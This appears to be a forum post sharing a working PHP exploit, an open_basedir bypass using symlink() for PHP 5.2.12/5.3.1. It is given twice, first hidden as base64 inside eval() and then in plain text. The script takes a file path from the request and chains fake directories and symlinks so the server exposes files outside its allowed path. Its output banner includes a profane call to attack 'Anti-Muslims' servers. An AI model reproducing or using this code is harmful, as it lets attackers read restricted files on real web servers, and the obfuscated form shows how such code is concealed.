Código: Seleccionar todo

<?php 
eval("?>".base64_decode("DQo8P3BocA0KLyoNClBIUCA1LjIuMTIvNS4zLjEgc3ltbGluaygpIG9wZW5fYmFzZWRpci
BieXBhc3MgDQpieSBEciBUcm9qYW4gKFVyZHVIYWNrKSBodHRwOi8vdXJkdWhhY2suYmxv
Z3Nwb3QuY29tLw0KdXJkdWhhY2tAZ21haWwuY29tDQoNCkNvZGVkIGF0IDI1LzcvMjAxMQ
0KKi8NCg0KJGZha2VkaXI9ImN4IjsNCiRmYWtlZGVwPTE2Ow0KDQokbnVtPTA7IC8vIG9m
ZnNldCBvZiBzeW1saW5rLiRudW0NCg0KaWYoIWVtcHR5KCRfR0VUWydmaWxlJ10pKSAkZm
lsZT0kX0dFVFsnZmlsZSddOw0KZWxzZSBpZighZW1wdHkoJF9QT1NUWydmaWxlJ10pKSAk
ZmlsZT0kX1BPU1RbJ2ZpbGUnXTsNCmVsc2UgJGZpbGU9IiI7DQoNCmVjaG8gJzxQUkU+PG
ltZyBzcmM9Imh0dHA6Ly8xLmJwLmJsb2dzcG90LmNvbS8taUhyN2drVzVpWUUvVFlVQ2k5
cjhBQUkvQUFBQUFBQUFCYU0vOV9TUW9pMXhjaVEvczMyMC9CbGFja0xvZ28uanBnP2N4NT
IxMS5waHAiPjxQPlRoaXMgaXMgZXhwbG9pdCBmcm9tIDxhDQpocmVmPSJodHRwOi8vdXJk
dWhhY2suYmxvZ3Nwb3QuY29tLyIgdGl0bGU9IlBlbmV0cmF0aW9uICYgU2VjdXJpdHkiPl
Bha2kgVXJkdUhhY2sgU2VjdXJpdHkgVGVhbSAtIDwvYT4uDQpBdXRob3IgOiBEciBUcm9q
YW4gKFVyZHVIYWNrKQ0KPHA+T25seSBGb3IgRnVja2luZyBBbnRpLU11c2xpbXMgU2Vydm
Vycy4NCjxwPlBIUCA1LjIuMTIgNS4zLjEgc3ltbGluayBvcGVuX2Jhc2VkaXIgYnlwYXNz
DQo8cD5Nb3JlOiA8YSBocmVmPSJodHRwOi8vdXJkdWhhY2suYmxvZ3Nwb3QuY29tLyI+VX
JkdUhhY2s8L2E+DQo8cD48Zm9ybSBuYW1lPSJmb3JtIg0KIGFjdGlvbj0iaHR0cDovLycu
JF9TRVJWRVJbIkhUVFBfSE9TVCJdLmh0bWxzcGVjaWFsY2hhcnMoJF9TRVJWRVJbIlBIUF
9TRUxGIl0pLiciIG1ldGhvZD0icG9zdCI+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImZp
bGUiIHNpemU9IjUwIiB2YWx1ZT0iJy5odG1sc3BlY2lhbGNoYXJzKCRmaWxlKS4nIj48aW
5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJoeW0iIHZhbHVlPSJDcmVhdGUgU3ltbGluayI+
PC9mb3JtPic7DQoNCmlmKGVtcHR5KCRmaWxlKSkNCglleGl0Ow0KDQppZighaXNfd3JpdG
FibGUoIi4iKSkNCglkaWUoIm5vdCB3cml0YWJsZSBkaXJlY3RvcnkiKTsNCg0KJGxldmVs
PTA7DQoNCmZvcigkYXM9MDskYXM8JGZha2VkZXA7JGFzKyspew0KCWlmKCFmaWxlX2V4aX
N0cygkZmFrZWRpcikpDQoJCW1rZGlyKCRmYWtlZGlyKTsNCgljaGRpcigkZmFrZWRpcik7
DQp9DQoNCndoaWxlKDE8JGFzLS0pIGNoZGlyKCIuLiIpOw0KDQokaGFyZHN0eWxlID0gZX
hwbG9kZSgiLyIsICRmaWxlKTsNCg0KZm9yKCRhPTA7JGE8Y291bnQoJGhhcmRzdHlsZSk7
JGErKyl7DQoJaWYoIWVtcHR5KCRoYXJkc3R5bGVbJGFdKSl7DQoJCWlmKCFmaWxlX2V4aX
N0cygkaGFyZHN0eWxlWyRhXSkpIA0KCQkJbWtkaXIoJGhhcmRzdHlsZVskYV0pOw0KCQlj
aGRpcigkaGFyZHN0eWxlWyRhXSk7DQoJCSRhcysrOw0KCX0NCn0NCiRhcysrOw0Kd2hpbG
UoJGFzLS0pDQoJY2hkaXIoIi4uIik7DQoNCkBybWRpcigiZmFrZXN5bWxpbmsiKTsNCkB1
bmxpbmsoImZha2VzeW1saW5rIik7DQoNCkBzeW1saW5rKHN0cl9yZXBlYXQoJGZha2VkaX
IuIi8iLCRmYWtlZGVwKSwiZmFrZXN5bWxpbmsiKTsNCg0KLy8gdGhpcyBsb29wIHdpbGwg
c2tpcCBhbGxyZWFkeSBjcmVhdGVkIHN5bWxpbmtzLg0Kd2hpbGUoMSkNCglpZih0cnVlPT
0oQHN5bWxpbmsoImZha2VzeW1saW5rLyIuc3RyX3JlcGVhdCgiLi4vIiwkZmFrZWRlcC0x
KS4kZmlsZSwgInN5bWxpbmsiLiRudW0pKSkgYnJlYWs7DQoJZWxzZSAkbnVtKys7DQoNCk
B1bmxpbmsoImZha2VzeW1saW5rIik7DQpta2RpcigiZmFrZXN5bWxpbmsiKTsNCg0KZGll
KCc8Rk9OVCBDT0xPUj0iUkVEIj5jaGVjayBzeW1saW5rIDxhIGhyZWY9Ii4vc3ltbGluay
cuJG51bS4nIj5zeW1saW5rJy4kbnVtLic8L2E+IGZpbGU8L0ZPTlQ+Jyk7DQoNCj8+DQo=/trojan")); ?>

Código: Seleccionar todo

<?php
/*
PHP 5.2.12/5.3.1 symlink() open_basedir bypass 
by Dr Trojan (UrduHack) http://urduhack.blogspot.com/
[email protected]

Coded at 25/7/2011
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img src="http://1.bp.blogspot.com/-iHr7gkW5iYE/TYUCi9r8AAI/AAAAAAAABaM/9_SQoi1xciQ/s320/BlackLogo.jpg?cx5211.php"><P>This is exploit from <a
href="http://urduhack.blogspot.com/" title="Penetration & Security">Paki UrduHack Security Team - </a>.
Author : Dr Trojan (UrduHack)
<p>Only For Fucking Anti-Muslims Servers.
<p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
<p>More: <a href="http://urduhack.blogspot.com/">UrduHack</a>
<p><form name="form"
 action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';

if(empty($file))
	exit;

if(!is_writable("."))
	die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
	if(!file_exists($fakedir))
		mkdir($fakedir);
	chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
	if(!empty($hardstyle[$a])){
		if(!file_exists($hardstyle[$a])) 
			mkdir($hardstyle[$a]);
		chdir($hardstyle[$a]);
		$as++;
	}
}
$as++;
while($as--)
	chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
	if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
	else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>